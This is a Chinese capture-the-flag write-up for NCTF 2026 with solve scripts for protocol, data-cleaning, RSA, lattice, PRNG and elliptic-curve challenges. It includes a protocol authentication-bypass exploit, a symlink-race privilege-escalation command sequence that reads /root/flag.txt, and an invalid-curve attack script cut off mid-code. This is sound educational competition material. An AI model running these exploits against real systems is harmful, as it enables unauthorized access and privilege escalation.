NCTF 2026 wp

(比赛结束出去拍的一张图,有人猜到这是哪里吗?)

AI大时代来临了(悲)

师傅们出的题都挺不错的,不过随着agent的普及,大家做题的能力都更强了,而对此的防御措施还没有成体系,希望我们明年可以做的更好吧

这次和学校的另外两个师傅完成了这份人工wp

misc

Merlin

严重非预期,dmp里面直接strings搜索一下就行

ezProtocol

进去可以看到一个类似协议伪代码的txt,还有一段test.pcapng

const (
        Magic = 0x47414D45 // GAME

        TypeAuth    = 0x01 //认证
        TypeQuery   = 0x02 //查询
        TypeGetFlag = 0x03 //拿flag

        HeaderSize = 10 

        // 偏移量
        OffsetMagic    = 0
        OffsetType     = 4
        OffsetLength   = 5
        OffsetChecksum = 6
        OffsetPayload  = 10
)

var Key = []byte{0x4e, 0x43, 0x54, 0x46} // NCTF

checksum := crc32.ChecksumIEEE(append(headerBytes, payloadBytes...))

根据Magic的偏移量0,我们用wireshark过滤一下流量

tcp.payload[0:4] == 47:41:4D:45

# 或者 tcp contains 47:41:4d:45

先追踪tcp流,根据payload的偏移量10,我们手动复制一下10字节之后的,用key解密之后发现是正确的

前面都是一些普通用户名的登录和失败

第五个比较重要,提示只有admin能拿到flag

{"message":"`nly admin can get flag","status":"error"}

沿着往下找注意到这个

对应的账号密码是{"username":"ctfer","password":"`mzh2026"}

是这样吗?其实不然,因为wireshark自动把不可见字符替换成了.,而异或对数值对齐的精度要求是非常高的,因此我们直接切换到原始hex数据进行异或

这下是对的了。{"username":"ctfer","password":"NCTF2026"}

已经得到了有权限的账号,我们就直接看容器,nc或者web直连都没有线索,联想到题目提示,应该是发个获得admin权限的包

这个漏洞点在于发完Auth再发Getflag,服务器不会发现你换了身份,于是第二关直接用admin的身份即可

import json
import socket
import zlib
from itertools import cycle

HOST = "114.66.24.221"
PORT = 39955
KEY = 0x4e, 0x43, 0x54, 0x46

def xor_payload(data): 
    return bytes(a ^ b for a, b in zip(data, cycle(KEY)))

def build_packet(msg_type, obj):
    payload = json.dumps(obj, separators=(",", ":")).encode()
    enc = xor_payload(payload)
    header = b"GAME" + bytes([msg_type, len(enc)]) + b"\x00\x00\x00\x00"
    checksum = zlib.crc32(header + enc) & 0xffffffff
    return b"GAME" + bytes([msg_type, len(enc)]) + checksum.to_bytes(4, "big") + enc

def recv_packet(sock):
    data = sock.recv(4096)
    t = data[4]
    l = data[5]
    plain = xor_payload(data[10:10+l])
    print("type =", t)
    print("body =", plain.decode())

with socket.create_connection((HOST, PORT), timeout=5) as s:
    s.sendall(build_packet(1, {"username": "ctfer", "password": "NCTF2026"})) # auth
    recv_packet(s)

    s.sendall(build_packet(3, {"username": "admin", "password": "x"})) # getflag
    recv_packet(s)

What a mess! && What another mess!

简单的数据清洗题,写脚本过滤即可(注意每个容器下发的数据和规则不一样)

先看一下要求,第一个是手机号的前缀

第二个是余额不小于0(不欠费)

第三个GB 11643-1999,查了一下是公民身份号码的国家标准,计算最后一个校验位就好

数据处理用pandas库,注意观察数据,因为许多比较脏的数据,还加了额外逻辑和正则搜索

import pandas as pd
import mojimoji # 全角转半角
import re # 正则

df = pd.read_csv("customer_dump.csv")

allowed = ('135', '136', '137', '138', '139', '150', '151', '152', '158', '159', '186', '188')
weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
check_map = "10X98765432"

def clean_text(s):
    s = "" if pd.isna(s) else str(s)
    s = mojimoji.zen_to_han(s, kana=False)
    s = re.sub(r'[\u200b-\u200f\u2060\ufeff]', '', s)
    return s.strip()

def clean_phone(phone):
    s = clean_text(phone)
    num = ''.join(filter(str.isdigit, s))
    if len(num) == 13 and num.startswith("86"):
        num = num[2:]
    return num

def check_phone(phone):
    p = clean_phone(phone)
    return len(p) == 11 and p.startswith(allowed)

def clean_id(id_card):
    s = clean_text(id_card).upper()
    s = re.sub(r'[^0-9X]', '', s)
    return s

def check_id(id_card):
    s = clean_id(id_card)
    if len(s) != 18:
        return False
    if not re.fullmatch(r'\d{17}[0-9X]', s):
        return False

    total = sum(int(s[i]) * weights[i] for i in range(17))
    return check_map[total % 11] == s[-1]

def clean_balance(balance):
    s = clean_text(balance).upper()
    s = s.replace("CNY", "").replace("¥", "").replace(",", "")
    if s == "":
        return 0.0
    return float(s)

def is_li(name):
    s = clean_text(name)
    return s.startswith("李") or s.lower().startswith("li")

df["Phone_clean"] = df["Phone"].apply(clean_phone)
df["Phone_valid"] = df["Phone"].apply(check_phone)

df["ID_clean"] = df["ID_Card"].apply(clean_id)
df["ID_valid"] = df["ID_Card"].apply(check_id)

df["Balance_clean"] = df["Balance"].apply(clean_balance)

df = df.drop_duplicates(subset=["Name", "ID_clean", "Phone_clean", "Balance_clean"])

q1 = df[df["Phone_valid"]]["Phone_clean"].nunique()

q2 = df["ID_valid"].sum()

q3_df = df[df["Phone_valid"] & df["ID_valid"]]
q3 = len(q3_df)

q4 = q3_df[q3_df["Balance_clean"] >= 0]["Balance_clean"].sum()

q5 = q3_df[q3_df["Name"].apply(is_li)].shape[0]

print(q1)
print(q2)
print(q3)
print(f"{q4:.2f}")
print(q5)

Quantum Vault

nc连接,先输入help看看

可以猜出来主任务是达到1000000USD并访问核心金库

能获取USD的只有两种,一种是collect,一次给1000,由于status查看到一次容器只开放120s,所以暴力收集肯定不可行

还有一种就是exch转换,这里的DIM是币种,AMT是金额

试试看exch,发现转换成MEME的时候数字会特别大,再转回USD几乎不变!

尝试两次就可以了

进去竟然直接拿shell了,逛逛看,发现/root无法访问,而/usr/local/bin下面有个神秘文件

ctfuser@uhj0i9hu-509c0aeec4b345dd:/$ ls
ls
bin   dev  home  lib32  libx32  mnt  proc  run   srv  tmp  var
boot  etc  lib   lib64  media   opt  root  sbin  sys  usr
ctfuser@uhj0i9hu-509c0aeec4b345dd:/$ cd usr
cd usr
ctfuser@uhj0i9hu-509c0aeec4b345dd:/usr$ ls
ls
bin    include  lib32  libexec  local  share
games  lib      lib64  libx32   sbin   src
ctfuser@uhj0i9hu-509c0aeec4b345dd:/usr$ cd local
cd local
ctfuser@uhj0i9hu-509c0aeec4b345dd:/usr/local$ ls
ls
bin  etc  games  include  lib  man  sbin  share  src
ctfuser@uhj0i9hu-509c0aeec4b345dd:/usr/local$ cd bin
cd bin
ctfuser@uhj0i9hu-509c0aeec4b345dd:/usr/local/bin$ ls
ls
q-vault-sync

有个神秘文件q-vault-sync,直接cat会乱码,我们strings一下

strings q-vault-sync

发现以下大概是程序输出内容

Quantum Core Financial Terminal - Sync Utility
Usage: %s [options]
Options:
  -s <file>    Specify the source quantum key file for validation.
  -d <dir>     Specify the destination shadow directory (Must be in /tmp/).
  -v           Enable verbose diagnostic output.
  -h           Display this help message and exit.
Description:
  This utility synchronizes local quantum entropy keys with the dimension
  ledger's shadow pool. It performs high-integrity ownership verification
  before initiating the cross-dimensional data transfer protocol.
s:d:vh
Error: Missing required arguments. Use -h for help.
/tmp/
[-] Security Error: Destination must reside within protected /tmp/ space.
lstat
[-] Security Violation: Dimensional instability detected (Symlink forbidden).
[-] Access Denied: Unauthorized key ownership.
[DEBUG] Ownership verified. Initializing entropy-sync...
[*] Check passed. Quantum key validation in progress...

典型的TOCTOU提权(什么是TOCTOU提权?)

简而言之,先在/tmp路径下创建一个普通文件通过权限验证,由于操作非原子化,我们再在open()操作之前把这个文件替换成敏感文件,从而达到提权的目的

# 注意这里有一些时间间隔的要求,必须复制一起粘贴
mkdir -p /tmp/qv
rm -f /home/ctfuser/src
echo SAFE > /home/ctfuser/src
/usr/local/bin/q-vault-sync -s /home/ctfuser/src -d /tmp/qv >/tmp/qv/run.log 2>&1 &
sleep 1
rm -f /home/ctfuser/src
ln -s /root/flag.txt /home/ctfuser/src
sleep 2.5
cat /tmp/qv/run.log
cat /tmp/qv/synced_key.dat

Crypto

EZRSA

一目了然的逐bit恢复,给出的信息完全够,先逐个枚举bit可能性后面用n%k-1bit检验,再加上一个剪枝检验(小于最大大于最小),逐bit恢复结束

from functools import lru_cache
nbits = 512
n = 113811568965055236591575124486758679392744553312134148909105203346767338399571149835776281246434662598568061596388663253038256689345299177200416663539845688277447346395189677568405388952270634599590543939397457325519084988358577805564978282375882831765408646889940777372958745826393653515323881370943911243589
e = 65537
c = 28637971616659975415203771281328378878549288421921080859079174552593926682380791394169267513651195690175911968893108214839850128311436983081661719981958725955998997347063633351893769712863719014753154993940174947685060864532241899917269380408066913133029163844049218414849768354727966161277243216291473824377
hint = 157624334507300300837306007943988438905196981213124202656160912356046979618961372023595598201180149465610337965346427263713514476892241848899142885213492
hbits = [(hint >> i) & 1 for i in range(nbits)]
pbits = [None] * nbits
qbits = [None] * nbits
pbits[0] = 1
qbits[0] = 1
pbits[nbits - 1] = 1
qbits[nbits - 1] = 1
assert (pbits[0] ^ qbits[nbits - 1]) == hbits[0]
assert (pbits[nbits - 1] ^ qbits[0]) == hbits[nbits - 1]
def bits_to_int(bits):
    x = 0
    for i, b in enumerate(bits):
        if b:
            x |= (1 << i)
    return x
def build_minmax(bits):
    mn = 0
    mx = 0
    for i, b in enumerate(bits):
        if b is None:
            mx |= (1 << i)
        elif b == 1:
            mn |= (1 << i)
            mx |= (1 << i)
    return mn, mx
ans = None
def dfs(k):
    global ans
    if ans is not None:
        return True
    if k == nbits // 2:
        p = bits_to_int(pbits)
        q = bits_to_int(qbits)
        if p * q == n:
            ans = (p, q)
            return True
        return False
    for pk in (0, 1):
        for qk in (0, 1):
            lo = k
            hi = nbits - 1 - k
            q_hi = hbits[lo] ^ pk
            p_hi = hbits[hi] ^ qk

            assigns = [
                (pbits, lo, pk),
                (qbits, lo, qk),
                (qbits, hi, q_hi),
                (pbits, hi, p_hi),
            ]
            backup = []
            ok = True
            for arr, idx, val in assigns:
                backup.append((arr, idx, arr[idx]))
                if arr[idx] is not None and arr[idx] != val:
                    ok = False
                    break
                arr[idx] = val
            if not ok:
                for arr, idx, oldv in backup:
                    arr[idx] = oldv
                continue
            mod = 1 << (k + 1)
            p_low = sum((pbits[i] or 0) << i for i in range(k + 1))
            q_low = sum((qbits[i] or 0) << i for i in range(k + 1))
            if (p_low * q_low) % mod != n % mod:
                for arr, idx, oldv in backup:
                    arr[idx] = oldv
                continue
            pmin, pmax = build_minmax(pbits)
            qmin, qmax = build_minmax(qbits)
            if not (pmin * qmin <= n <= pmax * qmax):
                for arr, idx, oldv in backup:
                    arr[idx] = oldv
                continue
            if dfs(k + 1):
                return True
            for arr, idx, oldv in backup:
                arr[idx] = oldv
    return False
dfs(1)
p, q = ans
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = m.to_bytes((m.bit_length() + 7) // 8, "big")
print("[+] flag =", flag.decode())

hardRSA

!?非预期?!

也是一个很明显的漏洞点,p**6的出现直接说明了大数近似忽略爆破的可能,又给出了d的量级,这时先尝试一下维纳,没出,那就开始基于近似爆破的分析

phi=N**6-(p**6+q**6)+1,N的量级比p大,可以近似忽略为phi=N**6,再由ed-1=k*phi,可以得到e/phi-k/d=1/d*phi,化简,近似忽略,得到e/phi=k/d,带入近似得到e/N**6=k/d,d的量级相对于N**6的量级很小,直接连分数展开,得到元组(k,d),带回初始式子ed-1=k*phi,模k下得到ed-1 modk=0检验(k,d),这样得到phi=ed-1/k

此时有2个方程,2个未知数,解题优化上可以令p+q=s,最后解出p,q,最基础的RSA恢复

from math import isqrt
N = 74919314162966623026780409394635730851359423962042152804673359696062303592948792225237959325724332015193893411896458285500680923291830113157053732353835717437056282529643649606999636042375356170625223068407005600597432512115745426297620503763041544738664221739366981075762409535100379250338620618401995088237
e = 115382440363851496163981840486384107492561192043935907058980266086827528886481753709205601977721854806609873255930935032352098823336758578514742052017664624320880734668505025950239731519576865823805968986213809315084654931730883582863309373723686304734918644860412520769285969343584540789781409990492019944165824625815300405767426485317259941101998781323411466463777306753584000597164370440130463322472428512359842079912370327303953535847288486792265729271519703439492772330110292227648936855652822622441290491046329984519666372475460813076592933292830035116887451745183745100906127431677048635228709073140092528296564430074027966676751247853438866388663691773416941464827914578065911403270794793189044046310361812370155771970529353757475322332721624146410615784452731493876192295337760243245754571266092484216808152656042093317366135329225792879900416688516879481855055555090043162672499662746617097324126665279154039087354142631899072583591875973448566342261418757933958097491430624847778317939143939884707606327061346526895306935081814341167557148974540052519764420837504151687245003054945691565644413351468736320044794906326974209391387438080503466412668871800294636642414652459851564340761041186735760949703483158497968185223108721790483665796212381899768853381692611758739543856321631250649771030357257110672427660801480674245151183281118006855095936338551269908982677103650278164957043853181158383261830382128373562401278765223263898827117486913915002789859131458355569155109058470780395630260922250802643984468511286231457608106175597829905176417125226959444682393922189933288709798973807586352487516329712976257944503755516552005154708122299515447476835290766731627959030431596313710392337334874777621376729257439721939577794752381362801045781355354034613981044768946879601448500750228731652608416508751483139575431367276816127751324213761
c = 46597101834449995414927716136287390792937263485498695607622613274985303919148099277379370499625616739447192289360957892792459785981292432370520768029645163669042553465834050214430965629198749117682681268121937191602353019996971164117733452207322953311422907574742284390173017434719506924876701654539254320355
def long_to_bytes(n):
    if n == 0:
        return b"\x00"
    return n.to_bytes((n.bit_length() + 7) // 8, "big")
def contfrac(a, b):
    while b:
        q = a // b
        yield q
        a, b = b, a - q * b
def convergents(cf):
    n0, d0 = 0, 1
    n1, d1 = 1, 0
    for a in cf:
        n2 = a * n1 + n0
        d2 = a * d1 + d0
        yield n2, d2
        n0, d0 = n1, d1
        n1, d1 = n2, d2
def recover_factors(N, e):
    approx = N ** 6
    for k, d in convergents(contfrac(e, approx)):
        if k == 0:
            continue
        ed1 = e * d - 1
        if ed1 % k != 0:
            continue
        Phi = ed1 // k
        A = (N ** 3 + 1) ** 2 - Phi
        L, R = 3 * N, 5 * N
        while L <= R:
            x = (L + R) // 2
            val = x * (x - 3 * N) * (x - 3 * N)
            if val == A:
                s2 = x
                s = isqrt(s2)
                if s * s != s2:
                    break
                delta = s2 - 4 * N
                t = isqrt(delta)
                if t * t != delta:
                    break
                p = (s + t) // 2
                q = (s - t) // 2
                if p * q == N:
                    return p, q, d, k
                break
            elif val < A:
                L = x + 1
            else:
                R = x - 1
    return None
res = recover_factors(N, e)
assert res is not None
p, q, d, k = res
m = pow(c, d, N)
print("[+] flag =", long_to_bytes(m))

ENCRYPT

逆向分析

附件是一个 64-bit ELF,主程序本身很短,真正的加密逻辑在外部动态库 libcipher.so 中。主函数流程大致如下:

  1. srand(time(0)) 初始化随机种子
  2. 随机生成 16 字节数据,调用 init(ctx, randbuf) 初始化加密上下文
  3. 读入用户输入,调用 encrypt(ctx, pt, ct, len) 输出用户密文
  4. 再读取 flag,用同一个 ctx 加密后输出 flag 密文

程序里最关键的问题是输入使用了 gets,但长度检查却在之后才用 strlen 判断是否超过 64 字节。这样就可以通过发送原始 \x00 截断 strlen,让程序误以为输入很短,但实际上 gets 已经把后续数据写进栈里,进而覆盖后面的 ctx。

也就是说,这题虽然表面是密码题,但从逆向角度看,核心突破点其实是一个栈溢出,并且溢出的目标不是直接劫持返回地址,而是篡改传给 libcipher.so 的加密上下文。后续结合黑盒测试可以发现,ctx 被覆盖后加密行为会发生明显变化,因此可以把它作为密码分析的切入点。

另外程序中还存在一个隐藏函数,会执行 system(“su ctf -s /bin/sh”),但由于二进制开启了 IBT + SHSTK,普通的 ret2win 并不好用,所以实际解题时还是转向“覆盖 ctx + 黑盒线性分析”这条路线。

以下是密码部分:

现在进入加密页面,输入128bit,反馈128bit

猜想可能LCG,CBC类似的简单黑盒,但只有一次机会,CBC类似的几率更大

也就是说加密是C=D(M)xorK,为了验证这个猜想,输入多组密文,得到K=C(B)xorB=C(A)xorA,验证了xor这一步的存在,同时也判断出不是直接xor之后得到脚本

这个时候构造m0,mi=m0 xoe e得到比特反转组,C0=Mm0 xor k,Ci=M(m0 xor ei)xor K,得到Ci xor C0=Mei,接下来拿到M的加密矩阵(线性),Cf xor C0=M(f xor m0),带入,解得f(差分去掉K)用到Cf上,得到f=m0 xorM**-1(Cf xor C0)

这一步成立的前提是D()加密是线性的,这里假设D(x)xorD(y)=D(x xor y)(线性),发现就是这种最简单的情况

import re
import socket
import time
from binascii import unhexlify


HOST = "114.66.24.221"
PORT = 34692

PROMPT = b"Enter plaintext in chars"
BASE = bytearray(b"A" * 16)


def recv_until(sock: socket.socket, marker: bytes) -> bytes:
    data = b""
    while marker not in data:
        chunk = sock.recv(4096)
        if not chunk:
            raise EOFError("connection closed before prompt")
        data += chunk
    return data


def query(msg: bytes) -> tuple[bytes, bytes]:
    s = socket.create_connection((HOST, PORT), timeout=5)
    s.settimeout(2)
    recv_until(s, PROMPT)
    s.sendall(msg + b"\n")

    out = b""
    try:
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    except Exception:
        pass
    s.close()

    text = out.decode("latin1", errors="replace")
    user_hex = re.search(r"Ciphertext \(hex\): ([0-9a-f]+)", text).group(1)
    flag_hex = re.search(r"Flag Ciphertext \(hex\): ([0-9a-f]+)", text).group(1)
    return unhexlify(user_hex), unhexlify(flag_hex)


def bits_from_bytes(data: bytes) -> list[int]:
    out = []
    for byte in data:
        for bit in range(8):
            out.append((byte >> bit) & 1)
    return out


def bytes_from_bits(bits: list[int]) -> bytes:
    out = bytearray()
    for i in range(0, len(bits), 8):
        value = 0
        for j in range(8):
            value |= (bits[i + j] & 1) << j
        out.append(value)
    return bytes(out)


def get_same_second_sample(msg: bytes) -> tuple[bytes, list[bytes]]:
    while True:
        current = int(time.time())
        while int(time.time()) == current:
            pass

        try:
            base_user, base_flag = query(bytes(BASE))
            k = bytes(x ^ 0x41 for x in base_user[:16])

            test_user, test_flag = query(msg)
            if base_flag != test_flag:
                continue

            transformed = bytes(x ^ y for x, y in zip(test_user[:16], k))
            flag_blocks = [
                bytes(x ^ y for x, y in zip(base_flag[i:i + 16], k))
                for i in range(0, 48, 16)
            ]
            return transformed, flag_blocks
        except Exception:
            continue


def solve_linear_block(columns: list[list[int]], target: bytes) -> bytes:
    rows = []
    target_bits = bits_from_bytes(target)
    for row_index in range(128):
        row = [columns[col][row_index] for col in range(128)]
        row.append(target_bits[row_index])
        rows.append(row)

    pivot_row = 0
    pivot_cols = [-1] * 128

    for col in range(128):
        pivot = None
        for row in range(pivot_row, 128):
            if rows[row][col]:
                pivot = row
                break
        if pivot is None:
            continue

        rows[pivot_row], rows[pivot] = rows[pivot], rows[pivot_row]
        pivot_cols[pivot_row] = col

        for row in range(128):
            if row != pivot_row and rows[row][col]:
                for k in range(col, 129):
                    rows[row][k] ^= rows[pivot_row][k]

        pivot_row += 1
        if pivot_row == 128:
            break

    if pivot_row < 128:
        raise RuntimeError("matrix is not invertible")

    solution = [0] * 128
    for row in range(127, -1, -1):
        col = pivot_cols[row]
        value = rows[row][128]
        for k in range(col + 1, 128):
            value ^= rows[row][k] & solution[k]
        solution[col] = value

    return bytes_from_bits(solution)


def main() -> None:
    base_transform, flag_targets = get_same_second_sample(bytes(BASE))
    print("[*] T(A*16) =", base_transform.hex())
    print("[*] targets:")
    for i, block in enumerate(flag_targets):
        print(f"    block{i}: {block.hex()}")

    columns = []
    for byte_index in range(16):
        for bit_index in range(8):
            msg = bytearray(BASE)
            msg[byte_index] ^= 1 << bit_index
            transformed, _ = get_same_second_sample(bytes(msg))
            diff = bytes(a ^ b for a, b in zip(transformed, base_transform))
            columns.append(bits_from_bytes(diff))
            print(f"[*] basis {byte_index * 8 + bit_index:03d}: {diff.hex()}")

    plain_blocks = [solve_linear_block(columns, block) for block in flag_targets]
    full = b"".join(plain_blocks)

    pad = full[-1]
    if 1 <= pad <= 16 and full.endswith(bytes([pad]) * pad):
        full = full[:-pad]

    print("[+] flag =", full.decode("latin1"))


if __name__ == "__main__":
    main()

flag{78250c78-6e81-4b0e-af20-b1bf961e498e}

RNG GAME

题干:输入seed使得与预设seed相同输出

尝试常见的输入绕过,加+,-,前面加0,中间加空格,第一次加-就成功了

RNG GAME REVEAGE

之前的输入口全部堵死了,只能从MT内在逻辑分析怎么伪造seed,之前我的样例都是标准的MT19937,输入是2**32,这个题干反馈报错是python的random.randint,可以直接排除LCG等不可能的,相较于基础的MT19937,为了seed输入自由化,同时又要满足2**32的输入,python会在init前面加上init_arry保证输入长度合法,把输入处理到2**32

大致处理流程是时间戳+k[i]+i,K[i]的处理是a1+a2**2**32+a3*2**64…,以一个简单key[10,20]举例,这这时length=2,623组状态填充就是10+0,10+1的循环,b不用管时间戳,这个是可以忽视的,这时就可以看到漏洞所在了,如果我的种子得到加长的循环,最后得到的MT内部状态一样

先验证一下边界,题目反馈的都是2**128,刻意给出2**256的种子,多一个bit就被判超出上限,证明就是加长循环

比如原来是[w0,w1,w2,w3],得到循环是[w0+0,W1+1,W2+2,W3+3…],这时构造循环[w0,w1,w2,w3,w0-4,w2-4,w3-4,w4-4](就是减去真循环长度)得到MT内部状态[w0+0,w1+1,w2+2,w3+3,w0-4+4=w0,w1-4+5=w1+1,w2-4+6=w2+2,w3-4+7=w3+3]得到一样的循环状态,自然也是一样的输出

from pwn import *
import re
import random
HOST = "114.66.24.221"
PORT = 31556
context.log_level = "info"
def alt_seed(seed: int) -> int:
    if seed == 0:
        words = [0]
    else:
        L = (seed.bit_length() - 1) // 32 + 1
        words = [(seed >> (32 * i)) & 0xffffffff for i in range(L)]
    L = len(words)
    alt_words = words + [((w - L) & 0xffffffff) for w in words]
    return sum(int(w) << (32 * i) for i, w in enumerate(alt_words))
def main():
    io = remote(HOST, PORT)
    banner = io.recvuntil(b"Give me your seed: ")
    text = banner.decode(errors="ignore")
    print(text)
    m = re.search(r"Here is my seed:\s*([0-9]+)", text)
    if not m:
        print("[-] parse seed failed")
        io.close()
        return
    seed = int(m.group(1))
    print(f"[+] seed = {seed}")
    print(f"[+] seed bit_length = {seed.bit_length()}")
    new_seed = alt_seed(seed)
    print(f"[+] alt_seed = {new_seed}")
    print(f"[+] alt_seed bit_length = {new_seed.bit_length()}")
    if new_seed == seed:
        print("[-] alt_seed unexpectedly equals original seed")
        io.close()
        return
    if new_seed < 0 or new_seed > (1 << 256):
        print("[-] alt_seed out of allowed range")
        io.close()
        return
    r1 = random.Random()
    r2 = random.Random()
    r1.seed(seed)
    r2.seed(new_seed)
    same = (r1.getstate() == r2.getstate())
    print(f"[+] local state equal = {same}")
    if not same:
        print("[-] local verification failed")
        io.close()
        return
    io.sendline(str(new_seed).encode())
    resp = io.recvall(timeout=3).decode(errors="ignore")
    print(resp)
    io.close()
if __name__ == "__main__":
    main()

yps

这道题有3个部分,极其典型的部分设计,可惜靶机拉跨,我做的时候直接就是好了的版本,3层的考点互相关联,基础的同时又不失技巧,能很快的入手的人已经很强了,仰视QAQ

最开始是LWE的部分,基本就是教科书级别的LWE小噪声,把输入meg移项得到as+e=b-mes modq,这里其实还有一层p-进恢复,具体的LWE原理在流程全梳理后,p-进恢复也一起

通过LWE得到s,s的用处在于输入椭圆曲线时的输入干扰,不能直接xor移项,因为有modp的条件约束,解决这一层之后,就可以自由控制输入坐标

最后一层,典型的ECDLP背景,发现没有检验点在不在曲线上,直接判断出是交互式无效曲线攻击,这个说来很巧,之前在ISCTF时学过静态的无效曲线攻击,让AI讲解时扯到这种交互式了,实现攻击后得到d,解AES,得到flag

1.LWE:如同上面所言,这道题给的LWE背景非常典型,移项之后就是经典案例,看看维度,77对100,信息论上成立(HNP时学的),先是p-进恢复,给定了p-进上的值,这里有点背包密码的意思,从小到大(背包超级递增是反着的)恢复,本质是a_int=ao+a1*q+a2*q**2+a3*q**3…,逐层a_int%q得到a0,a1=(a0/q)modq…理解上就是逐渐剥去q,现在得到了a了,回到LWE,小量e的出现就昭示着要使用格攻击,先提升模q域,得到t=kq+As+e,把As+qk看到一块,就是一个CVP问题,假设我们找到了这一块y,可以取模q得到,y=As modq,直接高斯消元可以解出s,现在回到如何解出y,标准的babai解CVP,由表达式自然生成矩阵M{A|qIm},这里直接就体现了方程,他就是t-y,想要他足够小,不会直接对M处理,因为他比较歪,不好CVP,这里选择进行LLL,找到一个更正交的,这一步之后再babai,本质上是找一个x,使Mx=y,正交化之后把目标t投影上去,得到y,形象地解释就是通过正交化分到各个方向,再投影使得各个方向上相近,y解出,按照前面提到地高斯消元解出s

2.xor恢复:输入要在模域q下xor s,这个时候我们不能直接xor移项,因为假如可以直接xor s,由于s的大小,直接把得到值拉大了,塞不下256的位了,这时就要弄一个等效的表达,在模域上,高位可以被化简,2**256可以被化简到38,把原输出改造成priv=HIGH*2**256+LOW,这时再变形得到x输入=Lxor(x目标-38H) modp,y同理

3.无效曲线攻击:我直接把我博客的搬过来了,原理应该一摸一样:查询曲线的域,构造一条不同b域光滑的曲线(实则随机选也可能可以),提取他的阶,计算出他的小因子r,N//r,取一个随机点(生成元也可以)C,本地跑加密(N//r)*C得到新点D,这个时候的D的阶是r的因子,特别当r是素数时,更好得到r,之后把D发送,得到E,因为D的阶很小,循环几次以后就归0,列举直到数据符合,得到dmodr,多次构造,得到一组CRT

#服务器的问题,有时数据会收集不到…后面想了一下,设置了sleep函数,就可以了

preparser(False)
from pwn import remote, context
from pwn import log as pwlog
from sage.all import *
from sage.modules.free_module_integer import IntegerLattice
from hashlib import sha256, sha512
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import re
import ast
import time
context.log_level = "info"
HOST = "114.66.24.221"
PORT = 40324
MAX_MSG = 100
P = 2**255 - 19
A_CURVE = 486662
N = 77
TARGET_BITS = 270
MAX_SMALL_FACTOR = 2**18
CONNECT_RETRY = 8
RECV_TIMEOUT = 2
ROUND_RETRY = 6
def pack_point(Pt):
    x, y = Pt
    return (int(x) << 256) | int(y)
def unack_point(n):
    x = n >> 256
    y = n & ((1 << 256) - 1)
    return (x, y)
def hash_low8_of_msg(m):
    h = int(sha512(str(m).encode()).hexdigest(), 16)
    return h & 0xff
def int_to_vec_base_q(x, q, N=N):
    v = []
    x = int(x)
    q = int(q)
    for _ in range(int(N)):
        v.append(int(x % q))
        x //= q
    return v
def vec_to_int_base_q(v, q):
    q = int(q)
    s = 0
    pw = 1
    for x in v:
        s += int(x) * pw
        pw *= q
    return int(s)
def open_conn():
    last_err = None
    for i in range(int(CONNECT_RETRY)):
        try:
            io = remote(HOST, int(PORT), timeout=int(RECV_TIMEOUT))
            return io
        except Exception as e:
            last_err = e
            pwlog.info(f"connect failed {i+1}/{int(CONNECT_RETRY)}: {e}")
            time.sleep(1)
    raise EOFError(f"cannot connect: {last_err}")
def recv_some_banner(io, timeout=RECV_TIMEOUT):
    data = b""
    for _ in range(20):
        try:
            chunk = io.recv(timeout=int(timeout))
        except EOFError:
            break
        if not chunk:
            break
        data += chunk
        if (b"modulus for today" in data and
            b"Seal:" in data and
            b"Heavenly Cipher:" in data):
            break
    return data
def parse_banner(io):
    data = recv_some_banner(io, timeout=RECV_TIMEOUT)
    if not data:
        raise EOFError("remote closed immediately without sending banner")
    text = data.decode(errors="ignore")
    q_match = re.search(r"modulus for today:\s*(\d+)", text)
    pub_match = re.search(r"Seal:\s*(\d+)", text)
    flag_match = re.search(r"Heavenly Cipher:\s*([0-9a-fA-F]+)", text)
    if not q_match or not pub_match or not flag_match:
        raise EOFError(f"parse banner failed, received:\n{text}")
    printed_q = int(q_match.group(1))
    master_pub_int = int(pub_match.group(1))
    enc_flag = bytes.fromhex(flag_match.group(1))
    return printed_q, unpack_point(master_pub_int), enc_flag, text
def ensure_menu(io):
    try:
        buf = io.recvuntil(b"Channel your intent", timeout=int(RECV_TIMEOUT))
        return buf
    except EOFError:
        raise
    except Exception:
        rest = io.recvrepeat(int(RECV_TIMEOUT))
        if b"Channel your intent" not in rest:
            raise EOFError(f"menu not found, received:\n{rest.decode(errors='ignore')}")
        return rest
def send_m(io, m):
    ensure_menu(io)
    io.sendline(b"m")
    io.recvuntil(b"Offer your spiritual essence", timeout=int(RECV_TIMEOUT))
    io.sendline(str(int(m)).encode())
    line = io.recvline_contains(b"Resonance echoes:", timeout=int(RECV_TIMEOUT))
    s = line.decode(errors="ignore").split("Resonance echoes:")[1].strip()
    ct = ast.literal_eval(s)
    return ct  # (a_int, b)
def send_e(io, point_int):
    ensure_menu(io)
    io.sendline(b"e")
    io.recvuntil(b"Forge your spirit formation", timeout=int(RECV_TIMEOUT))
    io.sendline(str(int(point_int)).encode())
    line = io.recvline_contains(b"Domain resonance:", timeout=int(RECV_TIMEOUT))
    s = line.decode(errors="ignore").split("Domain resonance:")[1].strip()
    return int(s)
def collect_round_samples(io, num=MAX_MSG):
    samples = []
    for i in range(int(num)):
        msg = i
        mu = hash_low8_of_msg(msg)
        a_int, b = send_m(io, msg)
        samples.append((msg, mu, int(a_int), int(b)))
        if (i + 1) % 10 == 0:
            pwlog.info(f"collected {i+1}/{int(num)} samples")
    return samples
def recover_round_q(samples, printed_q=None):
    return int(printed_q)
def solve_s_from_consistent_system(A_mod, rhs_mod):
    try:
        sol = A_mod.solve_right(rhs_mod)
        return [int(x) for x in sol]
    except Exception:
        pass
    m = int(A_mod.nrows())
    n = int(A_mod.ncols())
    rows = []
    cur = Matrix(A_mod.base_ring(), 0, n, [])
    for i in range(m):
        test = cur.stack(A_mod.row(i))
        if test.rank() > cur.rank():
            rows.append(i)
            cur = test
        if len(rows) == n:
            break
    if len(rows) < n:
        raise ValueError("not enough independent rows to solve for s")
    A_sub = Matrix(A_mod.base_ring(), [list(A_mod.row(i)) for i in rows])
    b_sub = vector(A_mod.base_ring(), [rhs_mod[i] for i in rows])
    sol = A_sub.solve_right(b_sub)
    return [int(x) for x in sol]
def recover_round_priv(samples, q, N=N):
    q = int(q)
    A_rows = []
    t_list = []
    for msg, mu, a_int, b in samples:
        a = int_to_vec_base_q(a_int, q, N)
        A_rows.append(a)
